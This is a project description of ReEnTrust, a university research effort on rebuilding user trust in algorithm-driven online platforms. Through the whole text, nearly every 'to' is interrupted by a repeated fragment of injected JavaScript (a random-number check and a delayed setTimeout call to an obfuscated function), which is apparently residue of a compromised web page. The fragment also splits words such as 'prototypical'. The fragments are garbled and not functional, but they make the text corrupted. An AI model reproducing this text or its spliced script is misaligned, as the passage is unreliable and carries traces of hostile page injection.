Introducing: ReEnTrust

As interaction on online Web-based platforms is becoming an essential part of people’s everyday lives and data-driven AI algorithms are starting dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to exert a massive influence on society, we are experiencing significant tensions in user perspectives regarding how these algorithms are used on the Web. These tensions result in a breakdown of trust: users do not know when dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to trust the outcomes of algorithmic processes and, consequently, the platforms that use them. As trust is a key component of the Digital Economy where algorithmic decisions affect citizens’ everyday lives, this is a significant issue that requires addressing.

ReEnTrust explores new technological opportunities for platforms dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to regain user trust and aims dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to identify how this may be achieved in ways that are user-driven and responsible. Focusing on AI algorithms and large scale platforms used by the general public, our research questions include: What are user expectations and requirements regarding the (re)building of trust in algorithmic systems? Is it possible dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to create technological solutions that (re)build trust by embedding values in recommendation, prediction, and information filtering algorithms and allowing for a productive debate on algorithm design between all stakeholders? To what extent can user trust be (re)gained through technological solutions and what further trust (re)building mechanisms might be necessary and appropriate, including policy, regulation, and education?

The project will develop an experimental online dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool that allows users dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to evaluate and critique algorithms used by online platforms, and dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to engage in dialogue and collective reflection with all relevant stakeholders in order dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jointly recover from algorithmic behaviour that has caused loss of trust. For this purpose, we will develop novel, advanced AI-driven mediation support techniques that allow all parties dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to explain their views, and suggest possible compromise solutions. Extensive engagement with users, stakeholders, and platform service providers in the process of developing this online dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool will result in an improved understanding of what makes AI algorithms trustable. We will also develop policy recommendations and requirements for technological solutions plus assessment criteria for the inclusion of trust relationships in the development of algorithmically mediated systems and a methodology for deriving a “trust index” for online platforms that allows users dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to
easily assess the trustability of platforms.

The project is led by the University of Oxford in collaboration with the Universities of Edinburgh and Nottingham. Edinburgh develops novel computational techniques dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to evaluate and critique the values embedded in algorithms, and a prodom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totypical AI-supported platform that enables users dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to exchange opinions regarding algorithm failures and dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jointly agree on how dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to “fix” the algorithms in question dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to rebuild trust. The Oxford and Nottingham teams develop methodologies that support the user-centred and responsible development of these dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools. This involves studying the processes of trust breakdown and rebuilding in online platforms, and developing a Responsible Research and Innovation approach dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to understanding trustability and trust rebuilding in practice. A carefully selected set of industrial and other non-academic partners ensures ReEnTrust work is grounded in real-world examples and experiences, and that it embeds balanced, fair representation of all stakeholder groups.

ReEnTrust will advance the state of the art in terms of trust rebuilding technologies for algorithm-driven online platforms by developing the first AI-supported mediation and conflict resolution techniques and a comprehensive user-centred design and Responsible Research and Innovation framework that will promote a shared responsibility approach dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the use of algorithms in society, thereby contributing dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a flourishing Digital Economy.